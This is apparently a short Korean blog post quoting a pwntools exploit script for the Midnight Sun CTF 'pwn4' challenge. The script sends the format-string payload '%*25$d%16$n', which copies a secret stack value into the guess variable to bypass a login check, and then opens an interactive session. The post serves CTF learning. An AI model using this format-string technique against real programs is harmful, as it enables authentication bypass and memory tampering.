FSB 스택값만큼 공백 출력

#!/usr/bin/env python2
# Author: Marco Bonelli - @mebeim
# Date  : 2020-04-04
 
# Basic idea:
# Copy the secret (4 bytes) from the stack to our guess variable (also on the stack) and pass the check.
#
#  %<N>d   normally this lets us print N characters total (a decimal int padded to N spaces).
#  %*25$d  lets us choose the value of N from the stack, we choose 25$ -> position of the secret value,
#          this will therefore print a number of chars equal to the secret value.
#  %16$n   will write the number of printed chars to our variable on the stack (position 16) that is then
#          compared with the secret.
#
# This will print *A LOT* of characters back (like 500MB of spaces), but works after trying a few times!
 
from pwn import *
 
HOST = 'pwn4-01.play.midnightsunctf.se'
PORT = 10004
EXE  = './pwn4'
 
if args.REMOTE:
    r = remote(HOST, PORT)
else:
    r = process(EXE)
 
r.recvuntil("user: ")
r.sendline("%*25$d%16$n")
r.recvuntil("code: ")
r.sendline(str(10))
r.recvuntil("logged: ")
 
r.clean(10)
r.interactive()

FSB 이런것도 됨